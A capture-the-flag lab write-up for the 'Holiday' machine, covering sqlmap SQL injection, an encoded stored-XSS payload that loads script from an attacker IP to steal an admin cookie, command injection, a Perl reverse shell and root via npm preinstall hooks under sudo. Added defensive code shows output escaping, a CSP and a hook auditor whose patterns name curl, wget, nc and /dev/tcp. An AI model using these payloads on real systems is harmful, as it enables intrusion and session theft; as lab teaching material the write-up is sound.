# Holiday

## Holiday - 10.10.10.25

### Target Enumeration:

OS: Linux

IP: 10.10.10.25

User: 5edc176c52673a6e0f087c68c531c743

Root: a844cb50bf88ebbe8412e095a6b642e8

### Ports / Services / Software Versions Running

```
22/tcp   open  http  OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
8000/tcp open  http  Node.js Express framework
```

### Vulnerability Exploited:

SQLi to obtain user login details

Stored cross-site scripting to steal the admin cookie

Command injection to gain a Perl shell

### Privilege Escalation:

The user can run npm via sudo, so a package's preinstall script executes commands as the root user.

<https://github.com/joaojeronimo/rimrafall>

### Exploiting the host:

Nmap

![](https://lh3.googleusercontent.com/qPp1Osgi463hoRJzNJiCeS3fNoz4rb6-imyavmiwCRchu5_iUbyKBvo7UZ8mU-czH-QD9iKpdDQ6CUHSaqx6LpSc83k1sj4v2IYK98GwfhYopx1tJKv5r0d-N8GKgZcC00fcQGNK)

Gobuster on port 8000 did not find anything the first time:

![](https://lh6.googleusercontent.com/gmWuzckIe6FXHiZdkXwx2giAWcQ2f4A4pNMF3OZP8nT7wR_NvbM6iGoikpL0uFvtOhUHDC3GoXWC7cNawkgf83Fm8YvT_uxARuOndm0H8BRvLkDiBh0N5XfuqjYRsjCIoLXS_L_2)

So modify the user agent to look like a browser:

![](https://lh4.googleusercontent.com/qfeFM66RLPF17LSCwmJyZnHa0_5N9OQPXFvN84Au26oli9A5AoltD1hoD_9MIqILae8rX7lADT0zrQ4NQz606lyNPgYckI04qwXqq4_1pT5iOv-7JsHl4jJtr187wFhGYXA4xWu3)

Login page at /login

![](https://lh4.googleusercontent.com/HQkCblYSyVnPBBXO5lHTtgG5_29BKtppiDU0DUGD7ebiZJrD82UgADrB8lpFh8rSQH68QszPAo7FH_r-jM9-84ERgPdbrZzYbcDkTe2EvhY_0xfDFgTF-zXPLta80-5_QNkEGu__)

Test for everything, including SQLi; capture the login request:

![](https://lh4.googleusercontent.com/xF11goiLPoJyYXOskk15kqIGarITn4ur--68M28eHhEOIaaqekAHlYnoSVT6YikowHyJNpYbkcqr79tszU2oNmfE3FH5xCi_6YKuGdD8Gh_fmL-tWTbJTvujkxcNQKZQ6GvWgBEh)

Save it as login.req and run `sqlmap -r login.req --level=5 --risk=3`

Vulnerable to SQLi:

![](https://lh6.googleusercontent.com/mNNAYXLaajMiGwvEDG4EE5eTSnnXGRfxxfcoDQgy_1_65FwWbIrPieLoWnRBYR4FjNRLTJW8ewN2cXoeH7qSXO9ozXlaUtKQ-k_fRfo1IGZITR3KqheXUhZjlnLLLJI_0hsx0GSw)

Dump the whole database:

```
sqlmap -r login.req --level=5 --risk=3 --dump
```

There is a username and what looks like an md5 hash in the database:

![](https://lh5.googleusercontent.com/S7ty8uz8vKYx8z0_rZ_l-e32tjcXjyuxQFx9z_I01AOCzopym8owEO59RocWZZNKwLbn3Y_AcBROCFdUENnJE8knwYcx2XGaUyBYHpXZc3fegq-fntNaImN1F2jaqS2y4GZK4ygY)

Google the hash and it looks like we have been rickrolled.

![](https://lh4.googleusercontent.com/RiAnYGx4eKYiqFjstRk02CogA613cZz4Wx-E_28sggVLzcUYAXRVWkYpInIlReGhx7vi8uPTJlzoAC282xSth49fS2C2U37Uqzuqtv_wjdNiz9eCI9KPq6zT7FVBTbslsLu4Jf5B)

Once logged in it appears to be a booking form.

![](https://lh3.googleusercontent.com/Vd0E8BpG5Okb3Oey_TRaV5BPWqrjHSEx4QA8m2QzKVGpIAwLTl6xRsynfr5BxcFhh9e9XDVyW_smfCZQyiJ3taREEusQ6lwRLUnAlxdfMNMuMoOWZJmNob9b7CFmpBg3JFzpsWtz)

Check the notes page, which an administrator reviews every minute, so it could be an XSS vector.

![](https://lh4.googleusercontent.com/SfPl4TATijpGtRqVal4g20rrWHU-wFRviaCuAhd-o8pXXAwDjNf-xGZCpSGfYNoGMgj3FTcQBCSaj3f2qdoZEBF3_2yKoLNB4EbJWHQrrLDQzvilByWpNAAQOZNcvJPOje4SYwET)

Initial testing found very little in the application, and an intensive scan for flaws also came back with nothing.

Try more advanced XSS with encoding:

Create the following inject.js file:

![](https://lh3.googleusercontent.com/8vSev32sXVSFTKOZTUtgvjMYFk-UVDayxmOLQdTjt-NoLOLOwo9aMDYZUEAQy61vLRZvyXFDvzJV8x7ktTJEjcw8LRGwbjbkZ9O_A6MZsR2b24bfR88hl0sYYJlD_l2O2lppivoU)

Encode the following string with <http://jdstiles.com/java/cct.html> before injecting it into the page:

```
document.write('<script src="http://10.10.14.8/inject.js"></script>');
```

![](https://lh5.googleusercontent.com/fGtYy90_pxuMGITCGMEs2ig6kd832mLUpj59L05F-IK43GySsRbKvPRljGj4KHdaWQf2jZRsFAhSZbk9_9dVwilm9GylBdnx_TAJy3XEX-nGHvFQyJfiHdVtnkkvQc-I71S9wP-t)

Create the following injection string in notepad (for debugging) and then add this to the page:

![](https://lh5.googleusercontent.com/xXUByc7slIKT0J-CRMKxO5B-IJrGrG2D02bmhyCC0Zy1ovNwRg1zg2nn0Z8wwpb4wuE6xa7tNzxLqdvGXFQdVao5dG9NJdIMBzfZGUVf2ji6PD6PdKIePf-hERQ7T95PeboCyNIt)

Like so:

![](https://lh3.googleusercontent.com/jGP51nR8dvdF9GgEC-oP-ULOao_L47zl0YkvTo8NLs2_tIxdtl1IufvVpXJK9he69BzWR9MsLSS-lDS358JXKEE2ijJziYxn1WFwecJaYB7YnGSsdEtVhv8MaYxJTO_2-V5awwU_)

Set up a nc listener and after 1 minute you should see the following:

![](https://lh3.googleusercontent.com/k7y51ABphneWG16NLhHiCrJvWRs6xwyXMAcR9JCdMRMGrXsWvEoU6_cH32lvob6tYVPvkxvzT-BGxCEyj5NOhLMuM5T825kewB6gW9Y7_6nxuFS3cKqk1fbiEl3iLrudb_dBkjMm)

Now create the following cookie-stealing script called inject.js and host it with a Python web server.

![](https://lh4.googleusercontent.com/Ft0RXlmHMAHI_LPW1d1WXMlpxHVfg7GhB2oSGuR5Wq0A-s-qTg7kR2bRJz-dd4Qaoe_aG9ScWfID9Kh6ZHwK6d8z_YNInWJ34hSsyOrQCV7Dp-jKTSnOuzjORYIJvPnmmeOu7Qlb)

Change your nc listener to port 8000.

Start a Python web server on port 80 to host your JavaScript.

Add a new note containing the injection string.

Wait around 1 minute.

Response from nc listener:

![](https://lh6.googleusercontent.com/9ZKkZ4DEklC03SzEP7o5sOatnRTMladpllrRv-2k8hLfTNozrkYUmgXWA0j76ihiZoQ7tq7u5IKqyL69ivBAhTF9Qcb3lhPfe-ICAWOMRDXxG_PnBdtiUSpvaE1OZdEFJie0D5Jt)

Copy the `cookie=$data` value into Burp and URL-decode it; now you have the admin cookie:

![](https://lh6.googleusercontent.com/3ARutrPNbZGPD5tf3OszQ-CP0L_SH-ohKw4UWxd-6092sJXeKnaKsIV_ZEW569_95Srdc7LvvfARYtQTM2cMBb9hkrABO75-mL5N4dcZsLttR2aneUY_Wn78phGFEqTV4a9XsOyI)
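The stored XSS above works because note text is rendered as HTML and the session cookie is readable from `document.cookie`. The following is an added example (not code from the writeup or the Holiday application) showing the hardening an Express-style notes page would need: output encoding, an HttpOnly session cookie, and a CSP that refuses script from a foreign host. The Express wiring in the comments is an assumed shape.

```javascript
// Added example (not from the original writeup): hardening helpers for a notes page.
// Pure functions so they can be exercised without starting a server.

// Escape the five HTML-significant characters before a note is interpolated into a
// template. Encoding tricks in the payload (String.fromCharCode, entity encoding) do
// not help: the note is never parsed as markup once these are escaped.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

function renderNote(note) {
  return `<li class="note">${escapeHtml(note)}</li>`;
}

// Session cookie attributes: HttpOnly keeps the value out of document.cookie, so
// injected script cannot exfiltrate it; Secure and SameSite limit where it is sent.
function sessionCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Strict`;
}

// CSP allowing scripts only from the app's own origin. A <script src="http://<other host>/...">
// written into the page would be refused by the browser even if escaping were missed.
const CSP = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

// Assumed Express wiring (illustrative, not executed here):
//   app.use((req, res, next) => { res.set('Content-Security-Policy', CSP); next(); });
//   res.append('Set-Cookie', sessionCookie('session', token));

// Constructed sample note mirroring the shape of the injection string used above,
// with a placeholder host instead of a real one.
const SAMPLE_NOTE = "document.write('<script src=\"http://ATTACKER_HOST/inject.js\"></script>');";

// Returns true when the rendered note contains no live script tag.
function isNeutralized(note) {
  return !/<script/i.test(renderNote(note));
}
```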

Request the /admin page, capture it in Burp and send it to Repeater:

![](https://lh5.googleusercontent.com/N-9yxZjZAVLM7JwlOfH2YQ_Kaub5luHyjydFlBrgYe-4cbKtwZQve5kPyiFNX_tOqEUCk1Lk37I7i3TLiuJ_HRSlejLaVimJgyW_Q75sgW3CKS1X0jRBtM5qqCxAcs8pTYBOpDX1)

Now show the response in the browser:

![](https://lh5.googleusercontent.com/yCvlqOK07KwO7BIo9ITtC_n6uYe8_twUBzG16McJT4KDLW3lx_rBJWq84MA3srw89FUpt-RsDI4E0t3Jrau5PtWKuOYk6-VxXFnLm36vsEOuAWsogZ69pJTbSOhEgjn8cl9x6VFT)

The export tables function allows command execution; make sure the admin cookie is set on the requests:

![](https://lh6.googleusercontent.com/7MoJqOYPZPcUrt5slKHcmadpTbmVJ_vMPk-Z2JqDX9HKxV7ef8MEFYPI1Thc3niqlJsnglRnfOVmI7TZ-d67FIo7ipCRK9cQPwEVKuQCf6Cc48D6g_9Ka-1mT-WMqtRDylRQ0D7C)

The application filters out certain characters, so use wget with your IP in binary format:

![](https://lh4.googleusercontent.com/aIUSixgPPRNCRFeXApZuq-a5ck2ABaIjTxk4fKb6Kl82Tt8IyM5wWE4tF4KXpXdrx9DZjhgz2zcCwRNLCME5DfW6xGpmxNTgV2o1BGXec5qcX6tkjhYa_iLRjz7HY31aaCxQV7lh)

This worked.

![](https://lh6.googleusercontent.com/h7uShWBGChUx2l2b3mM8gnVz_eFlIu2kgSaI4bIMjY_WLDg-NgaimBC9FGJqamqtD53CGWg0N99c-VVcImZG64yiESrTmGSBnJ7stB1eTsXYfAq00Z1wR7tPI9hAbd65-_IvlHUc)

Many tools are missing on this box and we are restricted in what we can use; however, Perl is available on the machine.

![](https://lh3.googleusercontent.com/Jvm6_0l3uiPK5fwl8MzkzIQWPrOLuv1fvZaQVgQZihCqC7TCNUmvTMhzPaqjwo_BCCFAGpZsBG02ipX-p-yB9M0ADmuCycU30dOCr346_rJcFRibNk0-yVnTp_lA1v5DCe4T5eJq)

Create a Perl reverse shell as follows:

![](https://lh3.googleusercontent.com/q3CLTxofw3KAHQAvwH4O-V8SF3u-Umtc1-2j-Je-IYQZwkqqRzB6IRthNBG85iGVhlYWfIwuukwL0gQnlPCOxt4ooweLUdFVp2UmkM1pnRUBEtOXYz6mGbu8j6cdXBtcz4kIjszO)

Download it to the target system with nc listening on port 443:

![](https://lh4.googleusercontent.com/mVb5IwGyJBeTR9_p0NPoxl7pf7I8KzqG_T8i5payiiUTPBAdotDufWLSL9g3LVrdut8zN2-I75IR3gxvHIrLP8GC8WUC_GYMhoKxWQT1I-HJPaJctA87mlvPkRDwz2p-0izIBN5J)

Execute the perl2 payload:

![](https://lh5.googleusercontent.com/5OMcxzlBDH5ogZaP3dxs100OPGe2UAMdWIVrIY1uOX2YrMEn06m9mDTt0OY0idj7Z2DAYAFQZYexSTzd0CjOW6VZqFzwSyphIWT_2jdezdk0sJNta2Y4tJIPQMs2_tdFhlQzZLej)

Now you have a shell:

![](https://lh3.googleusercontent.com/pp1ub9riht3iWyUqB1CVIE_1TMg-y286zP569ySKxH8956HlTe27PPPWVT9YVTmUW-n4Vct47vEyupaETrSM3QVihF-Do6IIIRLEAZRvL7pjqP1hh_vCL8B5x-LTbdSbhrENB-2o)

Grab the user.txt file:

![](https://lh5.googleusercontent.com/VW1QzT9qs_2G17PMbBr8b1M4HI5ijBSxDHNgr7fg0UPxA8L2apdIr3Ctu4PA2EZAgGvoaSfWkudAYomH0caThREWF2LNivgmdlI7WbQy7QpQSDXWaqx0NAkhzjUitNmC-K0TmEBx)

`sudo -l` shows which commands our current user may run via sudo:

![](https://lh5.googleusercontent.com/o6lSxyVO8bBwupHLC7TKfMhZ6FZWa7F6L6zFQn_Ec6ux2W_1qCA7dleqiXSF7gSTpZsOOabJS9txJRdyvQTaqfRqgpEuGk-CgsgZIHINsu2YU1w7UgqguDvzg_jxeBkhaNYeivGa)

Exploit link:

<https://github.com/joaojeronimo/rimrafall>

Create the following files locally:

![](https://lh6.googleusercontent.com/21pfbl-bibf4y_fiZ4C06m4IuFgf3ZjZAJohY28bDqzItuP7-t8W--zzGvY5s_GuazUjesUFImBANddx2nG8cvTgKMyjzqopQyHhEKB2BN4saZK2To-bXtXj3sCSUiMZzMyE_K7b)

Set up an nc listener on port 444 locally and download the created files into a directory called rimrafall/ in the app directory.

Then execute the following command to get root:

```
cd ../
sudo npm i rimrafall --unsafe
```

Now you have a root shell so collect the flag.

![](https://lh5.googleusercontent.com/FSQ7jQrXksdVTAMNbB4tqxmRlYYNw_QiMQBj4RRzu2oipp2FCV54buhXZBWpW4_PAzZk3xou4HSp7lvZ_iEYNfa_V5e7L2nzBaiNFEvVmXDRyTRAlvBcCJ91hiZxYFDiGcASrWTP)
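The privilege escalation works because npm runs a package's lifecycle scripts (preinstall, install, postinstall, and so on) with the privileges of whoever invokes npm, and sudo makes that root. As an added example (not code from the writeup or from the rimrafall project), the audit below reads a package manifest and reports every lifecycle hook, flagging commands that spawn a shell or reach the network; the sample manifest and the `SUSPICIOUS` heuristics are constructed for illustration.

```javascript
// Added example (not from the original writeup): audit a package.json for npm lifecycle
// hooks. Any of these run arbitrary commands at install time as the installing user.
const LIFECYCLE_HOOKS = [
  'preinstall', 'install', 'postinstall',
  'preuninstall', 'uninstall', 'postuninstall',
  'prepublish', 'prepare', 'prepack', 'postpack',
];

// Constructed heuristics: commands that spawn a shell, download, or escalate.
const SUSPICIOUS = [
  /\b(curl|wget|nc|ncat)\b/,
  /\b(bash|sh)\s+-[ic]\b/,
  /\/dev\/tcp\//,
  /\bsudo\b/,
  /\brm\s+-rf?\s+\//,
];

// One finding per lifecycle hook present in the manifest's "scripts" section.
function findLifecycleHooks(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  return LIFECYCLE_HOOKS
    .filter((hook) => Object.prototype.hasOwnProperty.call(scripts, hook))
    .map((hook) => ({ package: manifest.name || '<unnamed>', hook, command: scripts[hook] }));
}

// Mark a finding as risky when its command matches any heuristic.
function classify(finding) {
  return { ...finding, risky: SUSPICIOUS.some((re) => re.test(finding.command)) };
}

function auditManifest(manifest) {
  return findLifecycleHooks(manifest).map(classify);
}

// Constructed sample manifest (not rimrafall's real package.json). Under
// `sudo npm i <pkg>` the preinstall hook below would run as root; the
// postinstall hook is an ordinary native build and the "test" script is not a hook.
const SAMPLE_MANIFEST = {
  name: 'example-hook-pkg',
  version: '1.0.0',
  scripts: {
    preinstall: 'sh -c "id > /tmp/ran-as-$(whoami)"',
    postinstall: 'node-gyp rebuild',
    test: 'node test.js',
  },
};

// Mitigations this check supports: install with `npm install --ignore-scripts`
// (or `ignore-scripts=true` in .npmrc), and never grant sudo on npm or node.
console.log(JSON.stringify(auditManifest(SAMPLE_MANIFEST), null, 2));
```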
